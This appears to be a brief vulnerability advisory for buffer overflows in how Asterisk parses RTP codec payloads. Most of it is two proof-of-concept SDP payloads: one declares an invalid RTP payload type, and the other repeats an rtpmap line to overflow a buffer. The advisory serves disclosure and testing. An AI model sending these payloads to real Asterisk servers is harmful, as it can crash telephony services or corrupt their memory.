Asterisk RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities

Asterisk RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities

The following proof-of-concept payloads are available:

Example invalid SDP payload (invalid RTP payload type is 780903144):

v=0
o=- 817933771 817933775 IN IP4 10.10.1.101
s=session-name
c=IN IP4 10.10.1.101
t=0 0
m=audio 5000 RTP/AVP 0
a=rtpmap:780903144 PCMU/8000
a=rtpmap:4 G723/8000/1
a=rtpmap:97 telephone-event/8000

Example SDP payload:
v=0
o=- 817933771 817933775 IN IP4 10.10.1.101
s=session-name
c=IN IP4 10.10.1.101
t=0 0
m=audio 5000 RTP/AVP 0
a=rtpmap:0 PCMU/8000
[... repeat this line ...]
a=rtpmap:4 G723/8000/1
a=rtpmap:97 telephone-event/8000